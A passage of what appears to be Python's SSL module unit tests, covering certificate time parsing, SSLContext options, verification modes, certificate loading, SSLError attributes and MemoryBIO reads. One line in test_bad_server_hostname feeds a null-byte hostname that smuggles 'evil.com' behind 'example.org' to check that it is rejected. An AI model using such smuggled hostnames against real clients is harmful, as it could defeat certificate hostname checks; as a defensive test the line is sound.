self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
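# minimum_version/maximum_version default to the full supported range and
# can be narrowed; version-locked protocols such as PROTOCOL_TLSv1_1
# reject any change.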
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# OpenSSL has a fixed limit on the password buffer: PEM_BUFSIZE is
# generally 1 KB, so pass a password longer than that.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
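# A freshly created context must report every session counter as zero.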
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
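# load_cert_chain() must not populate the verification store; only
# load_verify_locations() does, with CA certificates counted as 'x509_ca'.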
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Enabling check_hostname automatically sets verify_mode to CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
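# MemoryBIO behaves as a FIFO byte buffer: writes append, reads drain.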
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
